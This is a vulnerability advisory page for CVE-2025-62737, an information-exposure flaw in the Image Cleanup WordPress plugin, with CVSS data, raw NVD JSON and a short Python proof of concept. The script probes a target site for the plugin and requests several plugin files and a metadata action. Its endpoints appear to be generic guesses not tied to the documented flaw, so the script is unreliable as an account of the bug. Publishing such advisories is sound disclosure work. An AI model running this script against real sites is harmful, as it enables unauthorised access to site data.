Security Vulnerability Report
中文
CVE-2025-62737 CVSS 5.3 MEDIUM

CVE-2025-62737

Published: 2025-12-09 16:18:02
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in opicron Image Cleanup image-cleanup allows Retrieve Embedded Sensitive Data.This issue affects Image Cleanup: from n/a through <= 1.9.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

opicron Image Cleanup <= 1.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62737 PoC - Image Cleanup Sensitive Data Exposure # Target: WordPress site with opicron Image Cleanup plugin <= 1.9.2 target = "http://target-site.com" # Step 1: Identify if Image Cleanup plugin is installed api_endpoint = f"{target}/wp-json/wp/v2/plugins?search=image-cleanup" response = requests.get(api_endpoint) if "image-cleanup" in response.text: print("[+] Image Cleanup plugin detected") # Step 2: Access sensitive data through plugin endpoint # The plugin exposes image metadata without proper authorization sensitive_endpoints = [ f"{target}/wp-content/plugins/image-cleanup/includes/ajax-handler.php", f"{target}/wp-content/plugins/image-cleanup/includes/functions.php", f"{target}/?action=image_cleanup_get_metadata&attachment_id=1" ] for endpoint in sensitive_endpoints: try: r = requests.get(endpoint, timeout=10) if r.status_code == 200 and len(r.text) > 0: print(f"[+] Found accessible endpoint: {endpoint}") print(f"[+] Response preview: {r.text[:500]}") except: pass print("[*] PoC execution completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62737", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:02.483", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in opicron Image Cleanup image-cleanup allows Retrieve Embedded Sensitive Data.This issue affects Image Cleanup: from n/a through <= 1.9.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/image-cleanup/vulnerability/wordpress-image-cleanup-plugin-1-9-2-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}